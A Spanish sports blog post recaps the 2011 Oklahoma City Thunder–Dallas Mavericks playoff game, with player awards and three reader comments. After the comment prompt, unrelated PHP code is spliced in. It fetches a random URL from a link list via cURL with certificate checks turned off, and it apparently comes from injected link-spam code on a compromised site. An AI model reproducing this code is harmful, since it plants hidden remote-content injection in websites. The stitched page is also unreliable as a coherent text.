Playoffs (19/05/2011): El poder del banquillo

20 de May de 2011 por txusma

Cuando analizábamos la serie comentábamos que los Thunder se apoyaban sobretodo en sus 2 jugadores All Stars mientras que Dallas ponía sobre la pista un juego más coral y de conjunto. Incluso afirmábamos sin rubor que “los Thunder no pueden desplegar una rotación solvente de 10 tíos”. Anoche, Oklahoma nos hizo tragar nuestras palabras aunque tampoco nos emocionemos. Los Thunder siguen siendo Durant, Westbrook y 10 tíos más pero partido a partido se demuestra que en este equipo cada uno sabe cual es su trabajo y que nadie está exento de calidad. Puntualmente, y seguramente debido al mal momento que atraviesa Westbrook, los reservas asumieron responsabilidades y cumplieron con creces con su obligación.

El partido llegó igualadísimo al último cuarto, ese período en que los Mavs se mueven tan bien como ya sufrieron los Lakers. Durant venía haciendo un buen partido mientras que Westbrook, aunque tirando mejor que el primer día, simplemente estaba correcto. En estas Scott Brooks se la jugó dejando en el banquillo a su base All Star y apostando por un quinteto pequeño formado por Eric Maynor, Daequan Cook, James Harden, Kevin Durant y Nick Collison. El resultado fue inmejorable. Nowitzki se salió con 16 puntos en el último cuarto pero los reservas de los Thunder respondieron a la perfección. Con un Durant vigilado hasta la extenuación fueron los otros 4 hombres los que encontraron el camino para anotar, sobretodo Harden que consiguió 10 importantísimos puntos. 106-100 y la serie que vuela empatada a Oklahoma.

PREMIOS

MVP: 23 puntos, 10 de ellos en el último cuarto, 7 rebotes y 4 asistencias. El papel de James Harden en estos Thunder crece día a día. Es una especie de Ginobili que decían que era 6º hombre porque salía desde el banquillo pero era importantísimo en los Spurs.

Sorpresa: No vale la pena comentar nada de JJ Barea, el mejor jugador de Dallas después de Nowitzki en esta serie. Destacaremos esta vez a Eric Maynor que, ocupando en muchas ocasiones el lugar de Westbrook, consiguió 13 puntos.

Decepción: Si en el primer partido anotó 24 puntos y fue el escudero perfecto de Nowitzki, anoche, Jason Terry, se quedó en unos tristes 8 puntos.

Esfuerzo en vano: El alemán, Dirk Nowitzki, se fue a los 29 puntos, 5 rebotes y 5 asistencias. No fue el partido perfecto del primer día pero fue el principal arma de los Mavs sobretodo en el último cuarto en el que anotó 16 puntos.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Partidazo de los Thunder para igualar la serie. En la primera parte parecía que los Mavs seguían claramente por delante y se llegaron a ir de más de 10 a base de los problemasa que creaba Nowitzki a la defensa Thunder, bien anotando o jugando bien para otros cuando recibía los 2 contra 1. Por los Thunder Westbrook estaban mucho mejor que en el primer partido y acompañaba a Durant que seguía dando problemas a Dallas. Así las cosas y tras un enorme mate de Durant, los Thunder reaccionaron para llegar por delante al descanso.
    Las cosas siguieron igualadísimas hasta el último cuarto donde sorprendentemente los reservas de los Thunder tomaron el mando. Con 4 reservas y Durant, los Thunder encontraron los puntos de Maynor y sobre todo de un fantástico James Harden que sigue creciendo en estos playoffs. Con ellos el ataque de los Thunder fue más equilibrado y a pesar de que Nowitzki les hizo un roto pudieron aguantar perfectamente hasta el final del partido. Por los Mavs de nuevo partidazo de Barea y bien Kidd pero les faltaron los puntos de sus tiradores Stojakovic y sobre todo Terry.
    Ahora esperan dos interesantísimos partidos en Oklahoma que pondrán a prueba a los Mavs. Para mí la serie está muy igualada y volverá 2-2 a Dallas para un decisivo 5º partido. Veremos si acierto…

      Citar

  2. Carlos dice:
    #2

    Westbrook mal momento? Le he visto jugar y no lo creo.

      Citar

  3. Txusma dice:
    #3

    Su primer partido fue paupérrimo y anoche lo sentaron todo el último cuarto, justo cuando se jugaban las habichuelas. Seguro que en el tercero vuelve a ser clave pero ahora mismo no creo que esté ultracontento con su rendimiento en este serie.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>